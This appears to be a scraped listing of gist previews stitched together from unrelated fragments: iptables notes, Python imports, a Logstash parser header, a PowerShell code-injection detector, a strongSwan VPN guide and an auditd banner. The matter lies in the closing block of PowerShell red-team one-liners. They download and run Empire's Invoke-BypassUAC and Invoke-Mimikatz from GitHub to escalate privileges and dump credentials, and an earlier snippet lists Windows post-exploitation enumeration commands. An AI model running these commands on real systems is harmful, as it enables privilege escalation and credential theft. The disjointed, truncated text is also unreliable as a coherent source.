1) Filter Table
Filter is default table for iptables. So, if you don’t define you own table, you’ll be using filter table. Iptables’s filter table has the following built-in chains.
import re | |
import json | |
import luigi | |
import pandas as pd | |
from mysolr import Solr | |
from bs4 import BeautifulSoup | |
class InputText(luigi.ExternalTask): |
// What system are we connected to? | |
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" | |
// Get the hostname and username (if available) | |
hostname | |
echo %username% | |
// Get users | |
net users | |
net user [username] |
# Bro-IDS Logstash parser | |
# Parts of this taken from http://www.appliednsm.com/wp-content/uploads/logstash-SObro22-parse.conf_.txt | |
#Logs being parsed: | |
#app_stats.log | |
#conn.log | |
#dns.log | |
#dpd.log | |
#files.log | |
#http.log |
1) Filter Table
Filter is default table for iptables. So, if you don’t define you own table, you’ll be using filter table. Iptables’s filter table has the following built-in chains.
function Get-InjectedThread | |
{ | |
<# | |
.SYNOPSIS | |
Looks for threads that were created as a result of code injection. | |
.DESCRIPTION | |
This setup is for remote users to connect into an office/home LAN using a VPN (ipsec). This is based on (but not the same as) the strongSwan documentation and this guide: https://raymii.org/s/tutorials/IPSEC_vpn_with_Ubuntu_16.04.html
I used strongSwan 5.5.1.
apt-get install -y strongswan strongswan-pki
# IMPORTANT! | |
# This gist has been transformed into a github repo | |
# You can find the most recent version there: | |
# https://github.com/Neo23x0/auditd | |
# ___ ___ __ __ | |
# / | __ ______/ (_) /_____/ / | |
# / /| |/ / / / __ / / __/ __ / | |
# / ___ / /_/ / /_/ / / /_/ /_/ / | |
# /_/ |_\__,_/\__,_/_/\__/\__,_/ |
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |